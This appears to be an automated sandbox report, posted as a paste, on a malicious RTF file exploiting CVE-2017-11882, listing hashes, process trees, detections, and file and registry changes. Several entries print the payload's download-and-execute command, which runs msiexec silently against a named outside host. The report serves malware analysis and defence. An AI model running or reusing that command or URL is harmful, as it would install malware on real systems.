paladin316

1695RTF_7bf3ae38dce045ad13937af9758c92e6_doc_2019-09-12_17_30.txt

Sep 12th, 2019
  1.  
  2. * ID: 1695
  3. * MalFamily: "CVE-2017-11882"
  4.  
  5. * MalScore: 10.0
  6.  
  7. * File Name: "RTF_7bf3ae38dce045ad13937af9758c92e6.doc"
  8. * File Size: 267473
  9. * File Type: "Rich Text Format data, version 1, unknown character set"
  10. * SHA256: "c21659b89b91c447b63993d2a169907afa432933ce32bb07357c86134de654b8"
  11. * MD5: "7bf3ae38dce045ad13937af9758c92e6"
  12. * SHA1: "8bf693003fd3e6d7aa487317fb3b7a6651197b1e"
  13. * SHA512: "c577be0ca5dd1ae3d2db89d728e7d2cb59f0df5bd35d8367a1b8e33e4994cd2c60e4528be9185b843b24dbbd2156c0317b30bfac88dd51dc3fa6207a03e8d2d4"
  14. * CRC32: "20EE51CA"
  15. * SSDEEP: "1536:sxxQW3ydnXEavohq0F3BYyEau8b56acpBb:sxt3NavohHCyAYu"
  16.  
  17. * Process Execution:
  18. "WINWORD.EXE",
  19. "services.exe",
  20. "svchost.exe",
  21. "EQNEDT32.EXE",
  22. "cmd.exe",
  23. "msiexec.exe",
  24. "EQNEDT32.EXE",
  25. "msiexec.exe",
  26. "svchost.exe",
  27. "WerFault.exe",
  28. "WerFault.exe",
  29. "WerFault.exe",
  30. "WerFault.exe",
  31. "wermgr.exe",
  32. "OSPPSVC.EXE",
  33. "svchost.exe",
  34. "explorer.exe",
  35. "dwm.exe"
  36.  
  37.  
  38. * Executed Commands:
  39. "\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\" -Embedding",
  40. "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
  41. "msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet",
  42. "C:\\Windows\\system32\\msiexec.exe /V",
  43. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  44. "\"C:\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPSVC.EXE\"",
  45. "C:\\Windows\\SysWOW64\\WerFault.exe -u -p 2388 -s 412",
  46. "C:\\Windows\\system32\\WerFault.exe -u -p 2464 -s 568",
  47. "werfault.exe /h /shared Global\\3a008cb8a8a343b69cfbf1705af540a3",
  48. "C:\\Windows\\system32\\werfault.exe -pr Global\\9257F125FFD5B45B",
  49. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\""
  50.  
  51.  
  52. * Signatures Detected:
  53.  
  54. "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
  55. "Details":
  56.  
  57.  
  58. "Description": "At least one process apparently crashed during execution",
  59. "Details":
  60.  
  61.  
  62. "Description": "Scheduled file move on reboot detected",
  63. "Details":
  64.  
  65. "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer"
  66.  
  67.  
  68.  
  69.  
  70. "Description": "Executed a command line with a /C or /R argument to terminate the command shell on completion, which can be used to hide execution",
  71. "Details":
  72.  
  73. "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
  74.  
  75.  
  76.  
  77.  
  78. "Description": "The RTF file contains embedded content",
  79. "Details":
  80.  
  81. "embedded content": "Object 2 index 0000BF6Bh contains embedded object cT6VvSve.3 with size 3584 bytes"
  82.  
  83.  
  84.  
  85.  
  86. "Description": "NtCreateThreadEx: newly created thread hidden from debugger",
  87. "Details":
  88.  
  89.  
  90. "Description": "Anomalous file deletion behavior detected (10+)",
  91. "Details":
  92.  
  93. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml"
  94.  
  95.  
  96. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp"
  97.  
  98.  
  99. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
  100.  
  101.  
  102. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
  103.  
  104.  
  105. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp"
  106.  
  107.  
  108. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
  109.  
  110.  
  111. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp"
  112.  
  113.  
  114. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
  115.  
  116.  
  117. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp"
  118.  
  119.  
  120. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
  121.  
  122.  
  123. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt"
  124.  
  125.  
  126. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml"
  127.  
  128.  
  129. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp"
  130.  
  131.  
  132. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp"
  133.  
  134.  
  135. "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  136.  
  137.  
  138. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp"
  139.  
  140.  
  141. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
  142.  
  143.  
  144. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
  145.  
  146.  
  147. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp"
  148.  
  149.  
  150. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
  151.  
  152.  
  153. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp"
  154.  
  155.  
  156. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
  157.  
  158.  
  159. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp"
  160.  
  161.  
  162. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
  163.  
  164.  
  165. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt"
  166.  
  167.  
  168. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml"
  169.  
  170.  
  171. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp"
  172.  
  173.  
  174. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp"
  175.  
  176.  
  177. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp"
  178.  
  179.  
  180. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
  181.  
  182.  
  183. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
  184.  
  185.  
  186. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp"
  187.  
  188.  
  189. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
  190.  
  191.  
  192. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp"
  193.  
  194.  
  195. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
  196.  
  197.  
  198. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp"
  199.  
  200.  
  201. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
  202.  
  203.  
  204. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp"
  205.  
  206.  
  207. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
  208.  
  209.  
  210. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr"
  211.  
  212.  
  213. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt"
  214.  
  215.  
  216. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml"
  217.  
  218.  
  219. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml"
  220.  
  221.  
  222. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp"
  223.  
  224.  
  225. "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp"
  226.  
  227.  
  228. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp"
  229.  
  230.  
  231. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
  232.  
  233.  
  234. "DeletedFile": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref"
  235.  
  236.  
  237.  
  238.  
  239. "Description": "Expresses interest in specific running processes",
  240. "Details":
  241.  
  242. "process": "OSPPSVC.EXE"
  243.  
  244.  
  245. "process": "WINWORD.EXE"
  246.  
  247.  
  248.  
  249.  
  250. "Description": "An HTTP/S link was seen in a script or command line",
  251. "Details":
  252.  
  253. "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
  254.  
  255.  
  256.  
  257.  
  258. "Description": "The RTF file has an unknown character set",
  259. "Details":
  260.  
  261.  
  262. "Description": "Uses Windows utilities for basic functionality",
  263. "Details":
  264.  
  265. "command": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet"
  266.  
  267.  
  268.  
  269.  
  270. "Description": "Sniffs keystrokes",
  271. "Details":
  272.  
  273. "SetWindowsHookExW": "Process: explorer.exe(1960)"
  274.  
  275.  
  276.  
  277.  
  278. "Description": "Code injection with CreateRemoteThread in a remote process",
  279. "Details":
  280.  
  281. "Injection": "WerFault.exe(2796) -> WINWORD.EXE(3068)"
  282.  
  283.  
  284.  
  285.  
  286. "Description": "Behavioural detection: Injection (inter-process)",
  287. "Details":
  288.  
  289.  
  290. "Description": "Behavioural detection: Injection with CreateRemoteThread in a remote process",
  291. "Details":
  292.  
  293.  
  294. "Description": "Behavioural detection: Transacted Hollowing",
  295. "Details":
  296.  
  297.  
  298. "Description": "Repeatedly calls a single API many times in an attempt to delay analysis",
  299. "Details":
  300.  
  301. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 1572664 times"
  302.  
  303.  
  304.  
  305.  
  306. "Description": "The EQNEDT32 equation process created a child process, likely indicative of the CVE-2017-11882 Office exploit",
  307. "Details":
  308.  
  309. "created_process": "cmd.exe & /C CD C: & msiexec.exe /i http://rivercitybusinessnetwork.com/app/ywhqtj.msi /quiet "
  310.  
  311.  
  312.  
  313.  
  314. "Description": "Stack pivoting was detected when using a critical API",
  315. "Details":
  316.  
  317. "process": "EQNEDT32.EXE:2388"
  318.  
  319.  
  320. "process": "msiexec.exe:2124"
  321.  
  322.  
  323.  
  324.  
  325. "Description": "Creates a hidden or system file",
  326. "Details":
  327.  
  328. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc"
  329.  
  330.  
  331.  
  332.  
  333. "Description": "File has been identified by 31 Antiviruses on VirusTotal as malicious",
  334. "Details":
  335.  
  336. "MicroWorld-eScan": "Exploit.RTF-ObfsStrm.Gen"
  337.  
  338.  
  339. "FireEye": "Exploit.RTF-ObfsStrm.Gen"
  340.  
  341.  
  342. "CAT-QuickHeal": "Exp.RTF.Obfus.Gen"
  343.  
  344.  
  345. "McAfee": "Exploit-CVE2017-11882.ah"
  346.  
  347.  
  348. "Arcabit": "Exploit.RTF-ObfsStrm.Gen"
  349.  
  350.  
  351. "Symantec": "Bloodhound.RTF.12"
  352.  
  353.  
  354. "ESET-NOD32": "probably a variant of Win32/Exploit.CVE-2017-11882.A"
  355.  
  356.  
  357. "TrendMicro-HouseCall": "Possible_SMBCVE20170199"
  358.  
  359.  
  360. "Kaspersky": "HEUR:Exploit.MSOffice.Generic"
  361.  
  362.  
  363. "BitDefender": "Exploit.RTF-ObfsStrm.Gen"
  364.  
  365.  
  366. "Ad-Aware": "Exploit.RTF-ObfsStrm.Gen"
  367.  
  368.  
  369. "Emsisoft": "Exploit.RTF-ObfsStrm.Gen (B)"
  370.  
  371.  
  372. "Comodo": "Exploit.W97M.CVE2017-11882.AG@843jmy"
  373.  
  374.  
  375. "F-Secure": "Heuristic.HEUR/Rtf.Malformed"
  376.  
  377.  
  378. "DrWeb": "Exploit.Rtf.CVE2012-0158"
  379.  
  380.  
  381. "TrendMicro": "Possible_SMBCVE20170199"
  382.  
  383.  
  384. "McAfee-GW-Edition": "Exploit-CVE2017-11882.ah"
  385.  
  386.  
  387. "Sophos": "Exp/201711882-P"
  388.  
  389.  
  390. "Cyren": "CVE-2017-11882!Camelot"
  391.  
  392.  
  393. "Avira": "HEUR/Rtf.Malformed"
  394.  
  395.  
  396. "MAX": "malware (ai score=83)"
  397.  
  398.  
  399. "Antiy-AVL": "TrojanExploit/OLE.CVE-2017-11882"
  400.  
  401.  
  402. "Microsoft": "Trojan:Script/Foretype.A!ml"
  403.  
  404.  
  405. "ZoneAlarm": "HEUR:Exploit.RTF.CVE-2017-11882.gen"
  406.  
  407.  
  408. "GData": "Exploit.RTF-ObfsStrm.Gen"
  409.  
  410.  
  411. "AhnLab-V3": "RTF/Malform-C.Gen"
  412.  
  413.  
  414. "TACHYON": "Trojan-Exploit/RTF.CVE-2017-11882"
  415.  
  416.  
  417. "Zoner": "Probably RTFObfuscation"
  418.  
  419.  
  420. "Rising": "Exploit.CVE-2017-11882/SLT!1.AEE3 (CLASSIC)"
  421.  
  422.  
  423. "Ikarus": "Exploit.CVE-2017-11882"
  424.  
  425.  
  426. "Qihoo-360": "susp.rtf.objupdate.gen"
  427.  
  428.  
  429.  
  430.  
  431. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  432. "Details":
  433.  
  434.  
  435. "Description": "The RTF file contains an object with potential exploit code",
  436. "Details":
  437.  
  438. "cve": "Object 2 index 0000BF6Bh contains Microsoft Equation 3.0 (Known Related to CVE-2017-11882 or CVE-2018-0802)"
  439.  
  440.  
  441.  
  442.  
  443.  
  444. * Started Service:
  445. "osppsvc",
  446. "msiserver",
  447. "WerSvc"
  448.  
  449.  
  450. * Mutexes:
  451. "Global\\MTX_MSO_Formal1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  452. "Global\\MTX_MSO_AdHoc1_S-1-5-21-0000000000-0000000000-0000000000-1000",
  453. "5CAC3FAB-87F0-4750-984D-D50144543427-VER15",
  454. "CicLoadWinStaWinSta0",
  455. "Local\\MSCTF.CtfMonitorInstMutexDefault1",
  456. "Global\\_MSIExecute",
  457. "Local\\WERReportingForProcess2388",
  458. "Global\\ca344605-d57d-11e9-8070-18c086cd4729",
  459. "Local\\WERReportingForProcess2464",
  460. "Global\\\\xe5\\x88\\x90\\xc7\\x9a",
  461. "Local\\WERReportingForProcess3068",
  462. "Global\\e6da076c-d57d-11e9-8070-18c086cd4729",
  463. "Global\\\\xed\\xac\\xb0\\xcd\\x9e",
  464. "WERUI_APPCRASH-c6a08aebbdac3f74ea291cf85a7fb8436eb98a5"
  465.  
  466.  
  467. * Modified Files:
  468. "C:\\Users\\user\\AppData\\Local\\Temp\\mnvi7zfcZsR3.doc",
  469. "C:\\Users\\user\\AppData\\Local\\Temp\\~$vi7zfcZsR3.doc",
  470. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRFFC3B42BF-0963-4DFD-8D4D-A3DC30366FA7.tmp",
  471. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS862D9AF4-6C86-4A2B-9EAC-76489E7C8F83.tmp",
  472. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRS8526D782-2370-4052-99E7-C3D049572C10.tmp",
  473. "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
  474. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
  475. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
  476. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
  477. "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
  478. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue",
  479. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB4EA.tmp.appcompat.txt",
  480. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB5B6.tmp.WERInternalMetadata.xml",
  481. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERB615.tmp.hdmp",
  482. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\WERBE44.tmp.mdmp",
  483. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_EQNEDT32.EXE_3c64166a7c24d5c56dea5044222ba8438d35112_cab_0abc29b3\\Report.wer",
  484. "C:\\ProgramData\\Microsoft\\OfficeSoftwareProtectionPlatform\\Cache\\cache.dat",
  485. "\\??\\PIPE\\srvsvc",
  486. "\\Device\\LanmanDatagramReceiver",
  487. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  488. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  489. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  490. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
  491. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
  492. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
  493. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
  494. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER6E47.tmp.appcompat.txt",
  495. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER727E.tmp.WERInternalMetadata.xml",
  496. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WER731C.tmp.hdmp",
  497. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\WERA75C.tmp.mdmp",
  498. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer",
  499. "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
  500. "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
  501. "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
  502. "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
  503. "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
  504. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\CVR9656.tmp.cvr",
  505. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERADB2.tmp.appcompat.txt",
  506. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WERD918.tmp.WERInternalMetadata.xml",
  507. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER16CE.tmp.xml",
  508. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER17B9.tmp.hdmp",
  509. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\WER44B6.tmp.mdmp",
  510. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\WER\\ReportQueue\\AppHang_WINWORD.EXE_f6b9906f3c977f2d556b78692e21da69e76402c_cab_0a340f6a\\Report.wer",
  511. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
  512. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
  513.  
  514.  
  515. * Deleted Files:
  516. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Schemas\\MS Word_restart.xml",
  517. "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\",
  518. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp",
  519. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB4EA.tmp.appcompat.txt",
  520. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp",
  521. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB5B6.tmp.WERInternalMetadata.xml",
  522. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp",
  523. "C:\\Users\\user\\AppData\\Local\\Temp\\WERB615.tmp.hdmp",
  524. "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp",
  525. "C:\\Users\\user\\AppData\\Local\\Temp\\WERBE44.tmp.mdmp",
  526. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  527. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp",
  528. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER6E47.tmp.appcompat.txt",
  529. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp",
  530. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER727E.tmp.WERInternalMetadata.xml",
  531. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp",
  532. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WER731C.tmp.hdmp",
  533. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp",
  534. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERA75C.tmp.mdmp",
  535. "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp",
  536. "C:\\Users\\user\\AppData\\Local\\Temp\\WERADB2.tmp.appcompat.txt",
  537. "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp",
  538. "C:\\Users\\user\\AppData\\Local\\Temp\\WERD918.tmp.WERInternalMetadata.xml",
  539. "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp",
  540. "C:\\Users\\user\\AppData\\Local\\Temp\\WER16CE.tmp.xml",
  541. "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp",
  542. "C:\\Users\\user\\AppData\\Local\\Temp\\WER17B9.tmp.hdmp",
  543. "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp",
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\WER44B6.tmp.mdmp",
  545. "C:\\Users\\user\\AppData\\Local\\Temp\\CVR9656.tmp.cvr",
  546. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp",
  547. "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\WERDD6C.tmp.ref",
  548. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_OSPPSVC.EXE_c6a08aebbdac3f74ea291cf85a7fb8436eb98a5_cab_081fada4\\Report.wer.tmp"
  549.  
  550.  
  551. * Modified Registry Keys:
  552. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\/ys",
  553. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
  554. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle",
  555. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ReviewCycle\\ReviewToken",
  556. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  557. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  558. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  559. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  560. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery",
  561. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34",
  562. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\CA5C34\\CA5C34",
  563. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\OUTLOOKFiles",
  564. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingConfigurableSettings",
  565. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastSyncTime",
  566. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Roaming\\RoamingLastWriteTime",
  567. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
  568. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTF",
  569. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\MTTA",
